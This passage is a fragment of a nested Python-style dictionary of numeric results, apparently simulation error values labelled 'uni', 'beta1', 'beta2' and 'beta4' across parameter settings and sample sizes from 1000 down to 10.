'beta2': 0.3359196893924308, 'beta4': [0.011917568033129048, 1.2117966329062095]}, 400: {'uni': 0.058860799267621965, 'beta1': 0.0063165150330285426, 'beta2': 0.3789779915309377, 'beta4': [0.009755269735322647, 1.1804431185986555]}, 300: {'uni': 0.07153008954664851, 'beta1': 0.011047298709712905, 'beta2': 0.42900186641443894, 'beta4': [0.009584723093740515, 1.1880360664225362]}, 200: {'uni': 0.06344836733337247, 'beta1': 0.00781338886239747, 'beta2': 0.38781497493064176, 'beta4': [0.009797652441966509, 1.1638617512261697]}, 150: {'uni': 0.07459560420290043, 'beta1': 0.014056540580835258, 'beta2': 0.39046599800764625, 'beta4': [0.01168897465145889, 1.143775876304623]}, 100: {'uni': 0.11462970160562651, 'beta1': 0.025847066135830016, 'beta2': 0.39498442294942704, 'beta4': [0.01690940914502444, 1.1220874640395795]}, 75: {'uni': 0.14759832305943538, 'beta1': 0.047967300368844945, 'beta2': 0.43098417504532077, 'beta4': [0.031171793994368147, 1.1060770360134216]}, 50: {'uni': 0.23542071804173764, 'beta1': 0.09719199816075956, 'beta2': 0.5013506677050935, 'beta4': [0.03824146010789057, 1.1001663175850784]}, 30: {'uni': 0.3096592063935794, 'beta1': 0.15176694546522967, 'beta2': 0.5802936759286862, 'beta4': [0.0520104795571762, 1.0790703149850533]}, 20: {'uni': 0.45262915303228857, 'beta1': 0.261027201183725, 'beta2': 0.6364867032723682, 'beta4': [0.07130296373607303, 1.0621513268964007]}, 10: {'uni': 0.7295542697541142, 'beta1': 0.5124743313750191, 'beta2': 0.8144547112453855, 'beta4': [0.12479877669495536, 1.0515776201768678]}}, 150: {1000: {'uni': 0.07909618379520475, 'beta1': 0.009086321462188735, 'beta2': 0.4106450929510854, 'beta4': [0.012610658427334429, 1.2924313816625217]}, 750: {'uni': 0.07407325699561099, 'beta1': 0.014177338709786392, 'beta2': 0.4420930391617977, 'beta4': [0.014296507845962717, 1.3032443798682725]}, 500: {'uni': 0.07511369957824804, 'beta1': 0.01459171218041179, 'beta2': 0.47288468448977605, 'beta4': [0.013729395246877836, 1.251141347455903]}, 
400: {'uni': 0.06944188808191638, 'beta1': 0.011176061659909423, 'beta2': 0.4035923111579738, 'beta4': [0.0125839858594099, 1.252919423776858]}, 300: {'uni': 0.06438335011755501, 'beta1': 0.016931344535076297, 'beta2': 0.4162306964573891, 'beta4': [0.010744824447481266, 1.222923097027982]}, 200: {'uni': 0.083964124476108, 'beta1': 0.014056137289547922, 'beta2': 0.4075437900930126, 'beta4': [0.013111563370934956, 1.2255955330645523]}, 150: {'uni': 0.07981799506756729, 'beta1': 0.01064409388613912, 'beta2': 0.3894789166335232, 'beta4': [0.023018732181305603, 1.2038155048533767]}, 100: {'uni': 0.14488849486361138, 'beta1': 0.020965041261413544, 'beta2': 0.5435612537940565, 'beta4': [0.01967025175597771, 1.1751658929630506]}, 75: {'uni': 0.12897242715258447, 'beta1': 0.05785618914959902, 'beta2': 0.4826347696087146, 'beta4': [0.02126529804324562, 1.1451923798322048]}, 50: {'uni': 0.21140150701110877, 'beta1': 0.10005146878076632, 'beta2': 0.5218040110926477, 'beta4': [0.036922327127357234, 1.1380283919405332]}, 30: {'uni': 0.31984297162744296, 'beta1': 0.1673346729784614, 'beta2': 0.5899636395543545, 'beta4': [0.056428456138648345, 1.0993767784566557]}, 20: {'uni': 0.4803508464303079, 'beta1': 0.2591276485033553, 'beta2': 0.6504322077039979, 'beta4': [0.07569043282680564, 1.0812645201801898]}, 10: {'uni': 0.6662991959861223, 'beta1': 0.5623584413477307, 'beta2': 0.7961858685655749, 'beta4': [0.11637566937767005, 1.0580619720265005]}}, 100: {1000: {'uni': 0.14063611585827807, 'beta1': 0.031228653444278272, 'beta2': 0.47970305740153707, 'beta4': [0.02119406846518135, 1.4093426070113058]}, 750: {'uni': 0.11080279866278557, 'beta1': 0.024578272682976215, 'beta2': 0.4781884547127654, 'beta4': [0.017108452919179756, 1.41979885240354]}, 500: {'uni': 0.11770170054806148, 'beta1': 0.022738881695332867, 'beta2': 0.5844182960912642, 'beta4': [0.019660423184423573, 1.4047538191133986]}, 400: {'uni': 0.09926981160838831, 'beta1': 0.02219582292278474, 'beta2': 0.671019314550252, 
'beta4': [0.02316966058932741, 1.3998233294106437]}, 300: {'uni': 0.11165748604091662, 'beta1': 0.029124281889602723, 'beta2': 0.4721222552275545, 'beta4': [0.021756365768324605, 1.3290924202376428]}, 200: {'uni': 0.12905012210969638, 'beta1': 0.02094718575899271, 'beta2': 0.47904864964482474, 'beta4': [0.022053897791131153, 1.2965456498187415]}, 150: {'uni': 0.11436257112395143, 'beta1': 0.027233016603507326, 'beta2': 0.505711169362763, 'beta4': [0.018463812410358174, 1.296183093117874]}, 100: {'uni': 0.1207577987530685, 'beta1': 0.03071522925704068, 'beta2': 0.477800710856348, 'beta4': [0.024519964931620897, 1.275243559696543]}, 75: {'uni': 0.19331469072257756, 'beta1': 0.02696019246477948, 'beta2': 0.5161607373371395, 'beta4': [0.026456646897275147, 1.2178304835805245]}, 50: {'uni': 0.2191415739843373, 'beta1': 0.06910385300920173, 'beta2': 0.5324442515990134, 'beta4': [0.03663912620751329, 1.1950430051511647]}, 30: {'uni': 0.27736623923689757, 'beta1': 0.15478071905259447, 'beta2': 0.6146633897712037, 'beta4': [0.05959673655496849, 1.1665156813618243]}, 20: {'uni': 0.40196115583372394, 'beta1': 0.2862799604210803, 'beta2': 0.6607899949419531, 'beta4': [0.0746458492423967, 1.1291374980340438]}, 10: {'uni': 0.6470479117720613, 'beta1': 0.5267194757051761, 'beta2': 0.8293978979725132, 'beta4': [0.13187127875511187, 1.1065295182068606]}}, 75: {1000: {'uni': 0.1515786966922324, 'beta1': 0.04592846518156684, 'beta2': 0.49675994638091236, 'beta4': [0.025848246678429294, 1.4979277518131913]}, 750: {'uni': 0.1359250794409579, 'beta1': 0.06269301788506419, 'beta2': 0.5300280831252744, 'beta4': [0.03172730420284062, 1.5582769770959521]}, 500: {'uni': 0.1489293835461733, 'beta1': 0.03758607283821415, 'beta2': 0.5591068809725539, 'beta4': [0.0290073547842622, 1.5015503418584653]}, 400: {'uni': 0.1620614533244523, 'beta1': 0.05170070240507436, 'beta2': 0.5319186060243111, 'beta4': [0.03172398797428782, 1.493476350917158]}, 300: {'uni': 0.17057859098038355, 'beta1': 
0.04058586637229189, 'beta2': 0.6618855931935482, 'beta4': [0.023707512357693854, 1.5208629132217224]}, 200: {'uni': 0.16919617696560252, 'beta1': 0.044511575340384274, 'beta2': 0.5604502346566455, 'beta4': [0.023421519588066396, 1.376070096376646]}, 150: {'uni': 0.16038601440082725, 'beta1': 0.04466704954413228, 'beta2': 0.5364478230042707, 'beta4': [0.02269054266192888, 1.3659137244555777]}, 100: {'uni': 0.16697780890015043, 'beta1': 0.05780266344429386, 'beta2': 0.6598988497330642, 'beta4': [0.02269683312496209, 1.3064106529050417]}, 75: {'uni': 0.18936779659288844, 'beta1': 0.0528588404071561, 'beta2': 0.5024015892218546, 'beta4': [0.02722661600125422, 1.2880066034829047]}, 50: {'uni': 0.23900875770128244, 'beta1': 0.08314836009999102, 'beta2': 0.7316807298861019, 'beta4': [0.0378678387401122, 1.244366535166112]}, 30: {'uni': 0.3386998692888889, 'beta1': 0.17154505920663973, 'beta2': 0.5992798646163214, 'beta4': [0.04917302283275163, 1.194126104878338]}, 20: {'uni': 0.39792219959430253, 'beta1': 0.2815541940784873, 'beta2': 0.747900941602933, 'beta4': [0.07551408684570264, 1.1705837460113553]}, 10: {'uni': 0.7085450643682678, 'beta1': 0.557285657062697, 'beta2': 0.7923738502247967, 'beta4': [0.12363410621488621, 1.1294702859709835]}}, 50: {1000: {'uni': 0.23388680552857205, 'beta1': 0.13013243901878963, 'beta2': 0.6069060830560372, 'beta4': [0.04117425543950271, 1.726982497483725]}, 750: {'uni': 0.3342542025053256, 'beta1': 0.09407677111881815, 'beta2': 0.6556558666300236, 'beta4': [0.04155147758863826, 1.6460758790319159]}, 500: {'uni': 0.2617400572920262, 'beta1': 0.08307527401736141, 'beta2': 0.913211655734957, 'beta4': [0.03865102052127645, 1.674268391357043]}, 400: {'uni': 0.2336538445225923, 'beta1': 0.0909012667517591, 'beta2': 0.6047353172470049, 'beta4': [0.040143198002047804, 1.6326149671287367]}, 300: {'uni': 0.23389869183851916, 'beta1': 0.08029673340728087, 'beta2': 0.7026588056699414, 'beta4': [0.03965227169879199, 1.5907846517974022]}, 200: 
{'uni': 0.24968943018733125, 'beta1': 0.08712704367432451, 'beta2': 0.6937256962543127, 'beta4': [0.03710393937932573, 1.5913617461424383]}, 150: {'uni': 0.2129598307100895, 'beta1': 0.08626171616487283, 'beta2': 0.6701299168130738, 'beta4': [0.04222205851236509, 1.4852236379671524]}, 100: {'uni': 0.294268810869127, 'beta1': 0.09392120576589265, 'beta2': 0.6588802567689228, 'beta4': [0.03189977184975169, 1.479025526521639]}, 75: {'uni': 0.20370496994007078, 'beta1': 0.08620506713922738, 'beta2': 0.8834851122792289, 'beta4': [0.0319486848668279, 1.5309361694540307]}, 50: {'uni': 0.26087340026827105, 'beta1': 0.08395940396348044, 'beta2': 0.9159051514594372, 'beta4': [0.039168451848731425, 1.383841945680644]}, 30: {'uni': 0.3325714781963125, 'beta1': 0.15878413600643707, 'beta2': 0.8205263409406076, 'beta4': [0.04978681556769162, 1.3087756883985266]}, 20: {'uni': 0.42221900278176994, 'beta1': 0.22043433453119662, 'beta2': 0.7218703048306292, 'beta4': [0.07200305013037528, 1.2953604206103195]}, 10: {'uni': 0.7118146005654853, 'beta1': 0.5550103219492982, 'beta2': 0.8332806436554525, 'beta4': [0.11416986569421834, 1.192908742724074]}}, 30: {1000: {'uni': 0.39344771901594, 'beta1': 0.20706826216296173, 'beta2': 1.0378238557282666, 'beta4': [0.06402478683767453, 2.0914805409739223]}, 750: {'uni': 0.39030540148633164, 'beta1': 0.2198275946592076, 'beta2': 0.8834133901640486, 'beta4': [0.06307415740510106, 2.6350773192000805]}, 500: {'uni': 0.41888410414718413, 'beta1': 0.23122088686383846, 'beta2': 0.9340881005678076, 'beta4': [0.07167461301839322, 1.9609099596987858]}, 400: {'uni': 0.3377834589368441, 'beta1': 0.29762769921415416, 'beta2': 0.9285193846147385, 'beta4': [0.07390554519418496, 2.0702923109061]}, 300: {'uni': 0.6212256230961715, 'beta1': 0.2304534632287249, 'beta2': 0.9311442743499334, 'beta4': [0.0811370567517077, 1.8612702544609139]}, 200: {'uni': 0.40692874449521754, 'beta1': 0.2118536070891281, 'beta2': 0.8911524179154159, 'beta4': [0.068806307218875, 
2.171137352139534]}, 150: {'uni': 0.39609796269299596, 'beta1': 0.20321160515473333, 'beta2': 0.9669393676536236, 'beta4': [0.07734188357043241, 2.0488754578525183]}, 100: {'uni': 0.47772960467285025, 'beta1': 0.23955521840544636, 'beta2': 1.093114783205816, 'beta4': [0.05647999347792319, 1.819279948595649]}, 75: {'uni': 0.49459915760994133, 'beta1': 0.7483228974591984, 'beta2': 1.0654241514219611, 'beta4': [0.05644331173725911, 1.8741005355316103]}, 50: {'uni': 0.4331535731141004, 'beta1': 0.23066294747587374, 'beta2': 1.045610584576763, 'beta4': [0.07252811484011165, 1.7866575621465575]}, 30: {'uni': 0.46993365210460936, 'beta1': 0.21062378826486575, 'beta2': 0.8982216898416053, 'beta4': [0.06060427283519371, 1.5645153212622234]}, 20: {'uni': 0.4600252576437871, 'beta1': 0.2996794531583841, 'beta2': 1.0103881743096814, 'beta4': [0.07026605480971959, 1.4899469734392818]}, 10: {'uni': 0.6594503348248166, 'beta1': 0.6052142478169568, 'beta2': 0.9869014312815094, 'beta4': [0.13715957666261736, 1.4056236673782823]}}, 20: {1000: {'uni': 0.7214489274861283, 'beta1': 0.7109602540608293, 'beta2': 1.4891565362913541, 'beta4': [0.10993312172398585, 2.4810788188995145]}, 750: {'uni': 0.8741829459110129, 'beta1': 0.6454387408943474, 'beta2': 1.3967706446447408, 'beta4': [0.10004324893926338, 2.22889028771558]}, 500: {'uni': 0.7729649834330807, 'beta1': 0.6947447893498436, 'beta2': 1.6680333781865306, 'beta4': [0.09859672804685067, 2.3474935663134167]}, 400: {'uni': 0.8037659477540411, 'beta1': 0.7015941173311855, 'beta2': 1.2339541081317063, 'beta4': [0.09169952977240271, 2.3104115893066273]}, 300: {'uni': 0.7479852286057033, 'beta1': 0.5048924805863739, 'beta2': 1.2057595986711336, 'beta4': [0.09546498930528277, 2.5352386394449127]}, 200: {'uni': 0.6052348664014313, 'beta1': 0.6718924234071889, 'beta2': 1.365705564221558, 'beta4': [0.1041836789818561, 2.4944754731499743]}, 150: {'uni': 0.7688254742087617, 'beta1': 0.6261770101829472, 'beta2': 1.2884360012787288, 'beta4': 
[0.09317440733924622, 2.4938849555699267]}, 100: {'uni': 0.71957651254854, 'beta1': 0.783943623581165, 'beta2': 1.1750563274777475, 'beta4': [0.07906754869135671, 2.611732685956283]}, 75: {'uni': 0.7212663908569285, 'beta1': 0.7491438048083165, 'beta2': 1.278401781969983, 'beta4': [0.09482530961721904, 2.314169022600685]}, 50: {'uni': 0.6513534744070623, 'beta1': 0.4853982257852653, 'beta2': 1.2421157076252283, 'beta4': [0.09218054510962954, 2.1348513584225044]}, 30: {'uni': 0.6801650950857789, 'beta1': 0.4735199294026357, 'beta2': 1.1720266455494714, 'beta4': [0.08458494028243027, 1.9719368906208312]}, 20: {'uni': 0.7808504905420437, 'beta1': 0.8855164069561684, 'beta2': 1.687205161553261, 'beta4': [0.07993917695329548, 2.018904621369056]}, 10: {'uni': 0.9041310834722268, 'beta1': 0.7158435630266999, 'beta2': 1.441125642826424, 'beta4': [0.13713575135187742, 1.6132607653419426]}}, 10: {1000: {'uni': 2.291865093409438, 'beta1': 3.796391956407082, 'beta2': 3.1343136686310404, 'beta4': [0.16591181945616454, 3.906378172009109]}, 750: {'uni': 2.06579510564522, 'beta1': 2.171132303701963, 'beta2': 2.43170413233102, 'beta4': [0.1714184982061991, 3.769544241401269]}, 500: {'uni': 1.7971825445298801, 'beta1': 2.8958816024514253, 'beta2': 2.3653595606869926, 'beta4': [0.20241339836195862, 4.077588626656164]}, 400: {'uni': 2.9424629521344974, 'beta1': 2.175911759881622, 'beta2': 2.604315847454542, 'beta4': [0.16266017066247487, 3.922604522260496]}, 300: {'uni': 1.9501226945273409, 'beta1': 3.782840007260135, 'beta2': 2.4106789863691453, 'beta4': [0.19330939984065848, 3.9702653485690873]}, 200: {'uni': 1.9928797910462663, 'beta1': 2.544676640580035, 'beta2': 2.818092333476372, 'beta4': [0.19321946623916747, 4.280267345101734]}, 150: {'uni': 2.6518203037821433, 'beta1': 2.6301937163774207, 'beta2': 2.662964550514325, 'beta4': [0.21170321149282043, 3.556982875367642]}, 100: {'uni': 2.899996349799425, 'beta1': 4.938592490365132, 'beta2': 3.2946845207767494, 'beta4': 
[0.20970024710748755, 4.918212312376091]}, 75: {'uni': 2.2712541486054723, 'beta1': 3.6115973476133356, 'beta2': 2.662909535043666, 'beta4': [0.19697867293373564, 3.6544730606284994]}, 50: {'uni': 1.8507652388899076, 'beta1': 2.535719173511266, 'beta2': 3.4567115555436216, 'beta4': [0.18431463594573702, 3.8942424792269956]}, 30: {'uni': 2.259855972095226, 'beta1': 2.507575552707849, 'beta2': 3.206096601185821, 'beta4': [0.1930477272227709, 2.9865306063349633]}, 20: {'uni': 3.323417704391435, 'beta1': 2.0495630344146014, 'beta2': 3.725865413632031, 'beta4': [0.1591708091618429, 4.0725701537088925]}, 10: {'uni': 2.683590243185979, 'beta1': 2.5526577443663645, 'beta2': 3.2041752255912126, 'beta4': [0.15035404637826302, 3.3085549636814515]}}}, 0.001: {1000: {1000: {'uni': 0.013537109538788296, 'beta1': 0.0004418669610901742, 'beta2': 0.2697608014805966, 'beta4': [0.0020188419600072316, 1.0765969581860098]}, 750: {'uni': 0.015518737693553651, 'beta1': 0.0004474752413131278, 'beta2': 0.3049834574567616, 'beta4': [0.002928484716195256, 1.0723749161682772]}, 500: {'uni': 0.025492576200161737, 'beta1': 0.00126278309841898, 'beta2': 0.2947895955099542, 'beta4': [0.004139147290479029, 1.06380419459373]}, 400: {'uni': 0.027388914557718014, 'beta1': 0.0017858676691235038, 'beta2': 0.2940695060349895, 'beta4': [0.004940725691007278, 1.0646782930881278]}, 300: {'uni': 0.043679103650868634, 'beta1': 0.004146600715111695, 'beta2': 0.3221074594010006, 'beta4': [0.0058809014285304325, 1.05171679158162]}, 200: {'uni': 0.055850905773996797, 'beta1': 0.012286663899209264, 'beta2': 0.35495235902886635, 'beta4': [0.011747346538206456, 1.0444923375059274]}, 150: {'uni': 0.07571408794730279, 'beta1': 0.00999545083178083, 'beta2': 0.39339731864243854, 'beta4': [0.015654464010031004, 1.04119667050509]}, 100: {'uni': 0.12878417183859997, 'beta1': 0.02319251025329732, 'beta2': 0.42206919367400175, 'beta4': [0.02605154363623979, 1.032808860624055]}, 75: {'uni': 0.17671912769998804, 'beta1': 
0.04651753009023005, 'beta2': 0.48290210890860846, 'beta4': [0.02542438975055508, 1.028587880357103]}, 50: {'uni': 0.2080017791039395, 'beta1': 0.09510052489274758, 'beta2': 0.5532686352849299, 'beta4': [0.04866446156086449, 1.024036289107115]}, 30: {'uni': 0.37174873647872525, 'beta1': 0.1763556838455918, 'beta2': 0.6073687185809629, 'beta4': [0.06065616138133705, 1.0204732817389364]}, 20: {'uni': 0.4706009281641317, 'beta1': 0.4172241498005575, 'beta2': 0.7267012642157473, 'beta4': [0.0878371580829132, 1.016042382017103]}, 10: {'uni': 0.6884462251280654, 'beta1': 0.6504310410056453, 'beta2': 0.8578616568198645, 'beta4': [0.17123050769669146, 1.0114288240221012]}}, 750: {1000: {'uni': 0.014032662653447249, 'beta1': 0.0004197603947433533, 'beta2': 0.3224155552733178, 'beta4': [0.0025877927402001293, 1.0992758471396775]}, 750: {'uni': 0.017656930734368415, 'beta1': 0.0006179708996352925, 'beta2': 0.32112678688815993, 'beta4': [0.0027850509560516695, 1.0896392012982408]}, 500: {'uni': 0.022487140809604803, 'beta1': 0.0015712340706562924, 'beta2': 0.306535854228737, 'beta4': [0.0036538931964645595, 1.0768857039245323]}, 400: {'uni': 0.02931711450909471, 'beta1': 0.0015953956989447965, 'beta2': 0.2940021793382613, 'beta4': [0.004512162746165237, 1.0787914212103158]}, 300: {'uni': 0.03797549613105823, 'beta1': 0.004238318530411427, 'beta2': 0.31851063220054193, 'beta4': [0.0070433871318897785, 1.0709324943449523]}, 200: {'uni': 0.0672635192185687, 'beta1': 0.01475666235800533, 'beta2': 0.36095052393035215, 'beta4': [0.010745748507439314, 1.060093775811335]}, 150: {'uni': 0.0782012161107774, 'beta1': 0.012171034981107647, 'beta2': 0.3989466015618546, 'beta4': [0.012275235549252002, 1.055035316087489]}, 100: {'uni': 0.1111671462254427, 'beta1': 0.03504805392658513, 'beta2': 0.4399388718825932, 'beta4': [0.023290484838746617, 1.0414289777455785]}, 75: {'uni': 0.1467229116392003, 'beta1': 0.03154826354242117, 'beta2': 0.46545805237237575, 'beta4': [0.027567286039267083, 
1.0413459531642508]}, 50: {'uni': 0.23242853631519125, 'beta1': 0.08764681410239905, 'beta2': 0.5282997805478701, 'beta4': [0.043790203869254855, 1.0312059461852012]}, 30: {'uni': 0.33478090270484767, 'beta1': 0.19986746017417012, 'beta2': 0.6464281529320948, 'beta4': [0.06216169944957162, 1.024300820754563]}, 20: {'uni': 0.46625228103566874, 'beta1': 0.3352913882162956, 'beta2': 0.7546236949727922, 'beta4': [0.07899091129224035, 1.021045206512229]}, 10: {'uni': 0.7532461209078295, 'beta1': 0.6554865690700844, 'beta2': 0.8689473621561907, 'beta4': [0.15450554655293974, 1.0158420905223018]}}, 500: {1000: {'uni': 0.02208336031576062, 'beta1': 0.0012806271939282098, 'beta2': 0.30491792281941166, 'beta4': [0.004154369009543563, 1.1291796536550491]}, 750: {'uni': 0.0249788378175696, 'beta1': 0.0010797670073452693, 'beta2': 0.34597268013437205, 'beta4': [0.0035547566741248944, 1.145887504602334]}, 500: {'uni': 0.03156864097576366, 'beta1': 0.001878931149848406, 'beta2': 0.33555105256994455, 'beta4': [0.004045741246069753, 1.1111524120461513]}, 400: {'uni': 0.02964039049766577, 'beta1': 0.0028752475332747426, 'beta2': 0.3189895492462362, 'beta4': [0.004475496924442904, 1.0985004462671362]}, 300: {'uni': 0.04054286140926675, 'beta1': 0.0030530447014601707, 'beta2': 0.33602501575095534, 'beta4': [0.005807153069867216, 1.089948008106302]}, 200: {'uni': 0.06368154738558036, 'beta1': 0.009413172181526356, 'beta2': 0.35093318039296945, 'beta4': [0.010128392991850291, 1.0749455354962245]}, 150: {'uni': 0.08560979711191868, 'beta1': 0.01814400620954622, 'beta2': 0.3817391631518634, 'beta4': [0.012693849833483756, 1.0766956230098896]}, 100: {'uni': 0.11065760228804478, 'beta1': 0.031931499364947796, 'beta2': 0.42393584933219425, 'beta4': [0.019711926476868896, 1.074086162181026]}, 75: {'uni': 0.13814860825841252, 'beta1': 0.047161838474747725, 'beta2': 0.461454606486388, 'beta4': [0.026718709086169346, 1.0529062226093644]}, 50: {'uni': 0.2924729124618689, 'beta1': 
0.08356191139025354, 'beta2': 0.5416545481337098, 'beta4': [0.048513803361591896, 1.047349564419994]}, 30: {'uni': 0.38994864567008714, 'beta1': 0.21557372764244884, 'beta2': 0.6108965479787709, 'beta4': [0.059368500830894747, 1.0431355252713714]}, 20: {'uni': 0.42393809596014487, 'beta1': 0.38044506197760547, 'beta2': 0.7206816523302737, 'beta4': [0.08428835003718527, 1.0344086832398853]}, 10: {'uni': 0.7381591918995368, 'beta1': 0.6448622984694605, 'beta2': 0.8475866078699237, 'beta4': [0.16783106781496734, 1.0239303365728043]}}, 400: {1000: {'uni': 0.027326134080412047, 'beta1': 0.0015489118053178246, 'beta2': 0.3257531838269524, 'beta4': [0.004363329218823618, 1.157047980101011]}, 750: {'uni': 0.03269613683176431, 'beta1': 0.00237347642961547, 'beta2': 0.3765112398224541, 'beta4': [0.0044084255091659495, 1.1515364706106115]}, 500: {'uni': 0.02829267608816353, 'beta1': 0.002113478462779276, 'beta2': 0.3699445800604303, 'beta4': [0.005062501969303326, 1.128564031724105]}, 400: {'uni': 0.02982284964668319, 'beta1': 0.0018557251431091941, 'beta2': 0.30418237177038493, 'beta4': [0.0055468098705524094, 1.124759552937044]}, 300: {'uni': 0.03633810592372252, 'beta1': 0.003329752124641255, 'beta2': 0.34503158449761623, 'beta4': [0.00764574873689276, 1.1336601117649365]}, 200: {'uni': 0.0618643630393636, 'beta1': 0.006239455946425697, 'beta2': 0.3893580111719922, 'beta4': [0.008740016065982145, 1.0944415138600063]}, 150: {'uni': 0.08290995558988935, 'beta1': 0.01485769035028909, 'beta2': 0.3895851178723324, 'beta4': [0.014543995199215603, 1.0911947267214124]}, 100: {'uni': 0.12733784071357707, 'beta1': 0.041792640842624705, 'beta2': 0.4170065697291755, 'beta4': [0.019429522082070005, 1.0836887858094717]}, 75: {'uni': 0.1639703758168183, 'beta1': 0.05486987789272019, 'beta2': 0.5020845124417863, 'beta4': [0.02454441092459795, 1.0759262870830304]}, 50: {'uni': 0.2228830962075744, 'beta1': 0.11564754038475192, 'beta2': 0.5212091861747059, 'beta4': [0.047308183312444844, 
1.0664568311962506]}, 30: {'uni': 0.3351992860790609, 'beta1': 0.16191267408494092, 'beta2': 0.5937982222349889, 'beta4': [0.06569858803208886, 1.0505472791656445]}, 20: {'uni': 0.5450729893841108, 'beta1': 0.43098366097308594, 'beta2': 0.6960946521774166, 'beta4': [0.08068269657512149, 1.0390693056594573]}, 10: {'uni': 0.7538652232296545, 'beta1': 0.7065202410569426, 'beta2': 0.8402242155683589, 'beta4': [0.15938925995624306, 1.0282263365830497]}}, 300: {1000: {'uni': 0.03623155105790878, 'beta1': 0.0025522247554552115, 'beta2': 0.3467467563959175, 'beta4': [0.007027836875807712, 1.1966502929456388]}, 750: {'uni': 0.0313950547463441, 'beta1': 0.004694441216264605, 'beta2': 0.36722656659770836, 'beta4': [0.0058771168613729555, 1.2034970232663906]}, 500: {'uni': 0.03539489610897603, 'beta1': 0.002663434080378617, 'beta2': 0.36331720497958425, 'beta4': [0.0064603241919073545, 1.1620579992997444]}, 400: {'uni': 0.0351254278473425, 'beta1': 0.00461414127398557, 'beta2': 0.3277459584398935, 'beta4': [0.0068608047998020005, 1.1704067166884702]}, 300: {'uni': 0.03980018699125466, 'beta1': 0.0054655033491287745, 'beta2': 0.3584428215881965, 'beta4': [0.005844562969263582, 1.1451011317868725]}, 200: {'uni': 0.05520695836413316, 'beta1': 0.00648381893317757, 'beta2': 0.38261363002766086, 'beta4': [0.009080285192231337, 1.1358137946469902]}, 150: {'uni': 0.09585002315832265, 'beta1': 0.014666160900098158, 'beta2': 0.3965763572228682, 'beta4': [0.01591317956737841, 1.1209589256111785]}, 100: {'uni': 0.1127142711948545, 'beta1': 0.02363531926273754, 'beta2': 0.45212575945962213, 'beta4': [0.02048277594290429, 1.1031644566986183]}, 75: {'uni': 0.14797467282265053, 'beta1': 0.03809387628580308, 'beta2': 0.4591848632040782, 'beta4': [0.03180981588767595, 1.1063373896373865]}, 50: {'uni': 0.2254379372771143, 'beta1': 0.09345713137258113, 'beta2': 0.5001164965271707, 'beta4': [0.04261601974244967, 1.0797165368273711]}, 30: {'uni': 0.40093684330112, 'beta1': 0.18938608352195094, 
'beta2': 0.665032310636, 'beta4': [0.06012863762712923, 1.0658667444693248]}, 20: {'uni': 0.4942285112700853, 'beta1': 0.2885547182303252, 'beta2': 0.6595791693752406, 'beta4': [0.08745746042355958, 1.0536053485041785]}, 10: {'uni': 0.7190345596593238, 'beta1': 0.6651211105848184, 'beta2': 0.826925122122391, 'beta4': [0.16051646670948755, 1.0471478131384455]}}, 200: {1000: {'uni': 0.060057793651372704, 'beta1': 0.006187938996693969, 'beta2': 0.36736477572277093, 'beta4': [0.009293227645305487, 1.267681265906244]}, 750: {'uni': 0.06046594852805391, 'beta1': 0.006509051778350212, 'beta2': 0.41313052787178256, 'beta4': [0.01142723790937598, 1.2309014344313365]}, 500: {'uni': 0.0740362005188402, 'beta1': 0.00849682830778454, 'beta2': 0.3818697598614397, 'beta4': [0.00942075185210953, 1.277912461458182]}, 400: {'uni': 0.04917940985082775, 'beta1': 0.0073151839179716694, 'beta2': 0.37681354718921994, 'beta4': [0.009762298223416793, 1.2374277805357872]}, 300: {'uni': 0.0509887818241694, 'beta1': 0.004721389267464698, 'beta2': 0.4137259989095081, 'beta4': [0.010709445552100886, 1.2195842345664258]}, 200: {'uni': 0.06092018198260521, 'beta1': 0.008126211311259117, 'beta2': 0.41377607585033904, 'beta4': [0.012552773795295888, 1.210814650871189]}, 150: {'uni': 0.08320861100830386, 'beta1': 0.010652599194381862, 'beta2': 0.410588921859252, 'beta4': [0.011377755543899413, 1.1605558296237972]}, 100: {'uni': 0.10647538233235196, 'beta1': 0.02675525864005623, 'beta2': 0.45027686602574685, 'beta4': [0.018774675358622005, 1.1425517213205887]}, 75: {'uni': 0.15075826113503984, 'beta1': 0.03812861351502258, 'beta2': 0.4821830000786633, 'beta4': [0.02588845495636567, 1.1460284931167872]}, 50: {'uni': 0.20748454934236824, 'beta1': 0.07956559814853244, 'beta2': 0.5318809243191449, 'beta4': [0.03400241330970483, 1.131144969956103]}, 30: {'uni': 0.39005891840591755, 'beta1': 0.23508768413194275, 'beta2': 0.604195019511204, 'beta4': [0.07300462632536944, 1.0968699306871237]}, 20: {'uni': 
0.47961991346108024, 'beta1': 0.3378509422322994, 'beta2': 0.6949090618591872, 'beta4': [0.08435933637998484, 1.0861750985584178]}, 10: {'uni': 0.7493592487162126, 'beta1': 0.7082252135351613, 'beta2': 0.8233197764550338, 'beta4': [0.16360988217538464, 1.0590739421875983]}}, 150: {1000: {'uni': 0.07246512795587667, 'beta1': 0.00940509489365912, 'beta2': 0.3834121832843376, 'beta4': [0.012061154345627774, 1.346345368105395]}, 750: {'uni': 0.08333214979418102, 'beta1': 0.012019314225734089, 'beta2': 0.41354718085794745, 'beta4': [0.013617336072865511, 1.317803333864672]}, 500: {'uni': 0.07223808071808703, 'beta1': 0.013444843438640032, 'beta2': 0.500497170757918, 'beta4': [0.013732312336221736, 1.3566135025043116]}, 400: {'uni': 0.07412227863180197, 'beta1': 0.009173025234347465, 'beta2': 0.5218918631188576, 'beta4': [0.010646990872949938, 1.3275623997460937]}, 300: {'uni': 0.06027828499856449, 'beta1': 0.008588769483821677, 'beta2': 0.43303765653591175, 'beta4': [0.011001496083177107, 1.2709377624732103]}, 200: {'uni': 0.07740533698799229, 'beta1': 0.01596227776300425, 'beta2': 0.4393860829917456, 'beta4': [0.013707242813425027, 1.235336706709078]}, 150: {'uni': 0.09469289988283666, 'beta1': 0.018010566018472236, 'beta2': 0.46689138360128024, 'beta4': [0.015442744929322542, 1.22737373023355]}, 100: {'uni': 0.10537401955613016, 'beta1': 0.02559635095907498, 'beta2': 0.4483188526069417, 'beta4': [0.020984796579724598, 1.1917347765643078]}, 75: {'uni': 0.1741885047544234, 'beta1': 0.05029710897697464, 'beta2': 0.4832427754379396, 'beta4': [0.02508555719013275, 1.1877236315076742]}, 50: {'uni': 0.23513358008851837, 'beta1': 0.08821603551377359, 'beta2': 0.5410204067376275, 'beta4': [0.03945996719545313, 1.154311026803482]}, 30: {'uni': 0.32655423356767815, 'beta1': 0.23627137526479217, 'beta2': 0.612345924047393, 'beta4': [0.06279287244508759, 1.127521379517458]}, 20: {'uni': 0.43138609640559733, 'beta1': 0.36249312001735073, 'beta2': 0.6879736777963187, 'beta4': 
